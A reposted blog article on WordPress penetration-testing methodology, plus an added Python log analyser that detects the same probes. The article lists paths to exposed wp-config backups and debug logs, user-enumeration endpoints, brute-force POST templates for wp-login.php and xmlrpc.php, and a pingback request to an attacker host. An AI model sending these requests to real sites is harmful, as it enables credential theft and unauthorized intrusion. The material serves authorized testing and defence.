Practical Guide | WordPress Site Penetration Testing Methodology
2022-9-23 18:14:32 Author: www.secpulse.com

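If you come across a website running WordPress, what do you do? What is your approach to penetration testing and security assessment?

If you visit https://target.com and view the page source, you will see links to WordPress themes and plugins.

Or you can visit https://target.com/wp-login.php, which is the WordPress admin login page.

Find the relevant CVEs by checking the core, plugin and theme versions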

https://target.com/feed 
https://target.com/?feed=rss2
https://target.com/wp-content/plugins/PLUGINNAME/readme.txt 
https://target.com/wp-content/plugins/PLUGINNAME/readme.TXT 
https://target.com/wp-content/plugins/PLUGINNAME/README.txt 
https://target.com/wp-content/plugins/PLUGINNAME/README.TXT
https://target.com/wp-content/themes/THEMENAME/style.css 
https://target.com/wp-content/themes/THEMENAME/readme.txt (if the theme has a readme file)

If you find an outdated core/plugin/theme, look for the exploit on https://wpscan.com

http://target.com/wp-content/debug.log

Look for wp-config backup files

http://target.com/.wp-config.php.swp 
http://target.com/wp-config.inc 
http://target.com/wp-config.old 
http://target.com/wp-config.txt 
http://target.com/wp-config.html 
http://target.com/wp-config.php.bak 
http://target.com/wp-config.php.dist 
http://target.com/wp-config.php.inc 
http://target.com/wp-config.php.old 
http://target.com/wp-config.php.save 
http://target.com/wp-config.php.swp 
http://target.com/wp-config.php.txt 
http://target.com/wp-config.php.zip 
http://target.com/wp-config.php.html 
http://target.com/wp-config.php~

http://target.com/?author=1

Or

http://target.com/wp-json/wp/v2/users 
http://target.com/?rest_route=/wp/v2/users

POST /wp-login.php HTTP/1.1
Host: target.com

log=admin&pwd=BRUTEFORCE_IN_HERE&wp-submit=Log+In&redirect_to=http%3A%2F%2Ftarget.com%2Fwp-admin%2F&testcookie=1

Or

POST /xmlrpc.php HTTP/1.1
Host: target.com

<?xml version="1.0" encoding="UTF-8"?>
<methodCall>
  <methodName>wp.getUsersBlogs</methodName>
  <params>
    <param><value>admin</value></param>
    <param><value>BRUTEFORCE_IN_HERE</value></param>
  </params>
</methodCall>

POST /xmlrpc.php HTTP/1.1
Host: target.com

<methodCall>
  <methodName>pingback.ping</methodName>
  <params>
    <param><value><string>http://yourip:port</string></value></param>
    <param><value><string>https://target.com</string></value></param>
  </params>
</methodCall>

http://example.com/wp-login.php?action=register
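
Seen from the defender's side, every request listed above leaves a recognisable entry in the web server's access log. The following Python code is an added example, not part of the original article: it flags those paths in constructed common-log-format lines and counts POSTs to /wp-login.php and /xmlrpc.php per client. The names analyze, exposed and SIGNATURES, the threshold of 5, and the sample lines are assumptions made for illustration.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Signatures derived from the URLs listed in this article.
SIGNATURES = [
    ("wp-config-backup", re.compile(r"^/\.?wp-config(\.php)?(\.(swp|inc|old|txt|html|bak|dist|save|zip)|~)(\?|$)")),
    ("debug-log", re.compile(r"^/wp-content/debug\.log(\?|$)")),
    ("user-enum", re.compile(r"^/(\?author=\d+|wp-json/wp/v2/users\b|\?rest_route=/wp/v2/users\b)")),
    ("version-probe", re.compile(r"^/wp-content/(plugins|themes)/[^/]+/readme\.txt(\?|$)", re.I)),
]
AUTH_ENDPOINTS = ("/wp-login.php", "/xmlrpc.php")
# Common/combined log format: ip ident user [time] "METHOD target proto" status
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')

def analyze(lines, post_threshold=5):
    """Return (findings, suspects): probe hits and per-client POST floods."""
    findings, posts = [], Counter()
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        ip, method, target, status = m.groups()
        target = unquote(target)  # catch %2F-encoded variants of the same paths
        path = target.split("?", 1)[0]
        if method == "POST" and path in AUTH_ENDPOINTS:
            posts[(ip, path)] += 1
        for label, rx in SIGNATURES:
            if rx.search(target):
                findings.append((ip, label, target, int(status)))
                break
    return findings, {key: n for key, n in posts.items() if n >= post_threshold}

def exposed(findings):
    """Probes answered with 200: check whether the file is really being served."""
    return [f for f in findings if f[1] in ("wp-config-backup", "debug-log") and f[3] == 200]

# Constructed sample log lines (documentation IP ranges, hypothetical plugin and theme names).
TS = "[23/Sep/2022:18:14:32 +0000]"
SAMPLE = [
    f'203.0.113.7 - - {TS} "GET /wp-config.php.bak HTTP/1.1" 404 153',
    f'203.0.113.7 - - {TS} "GET /wp-config.php~ HTTP/1.1" 200 3121',
    f'203.0.113.7 - - {TS} "GET /?author=1 HTTP/1.1" 301 0',
    f'203.0.113.7 - - {TS} "GET /?rest_route=%2Fwp%2Fv2%2Fusers HTTP/1.1" 200 512',
    f'198.51.100.4 - - {TS} "GET /wp-content/plugins/example-plugin/README.txt HTTP/1.1" 200 900',
    f'192.0.2.10 - - {TS} "GET /wp-content/themes/example/style.css HTTP/1.1" 200 100',
] + [f'203.0.113.7 - - {TS} "POST /xmlrpc.php HTTP/1.1" 200 400'] * 6
if __name__ == "__main__":
    print(*analyze(SAMPLE), sep="\n")
```

A 200 response to a wp-config backup or debug.log request is the case to investigate first; the remaining hits indicate reconnaissance rather than exposure.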

Author of this article: HACK_Learn

This article was published by a SecPulse column author. When reposting, please credit: https://www.secpulse.com/archives/187638.html


Source: https://www.secpulse.com/archives/187638.html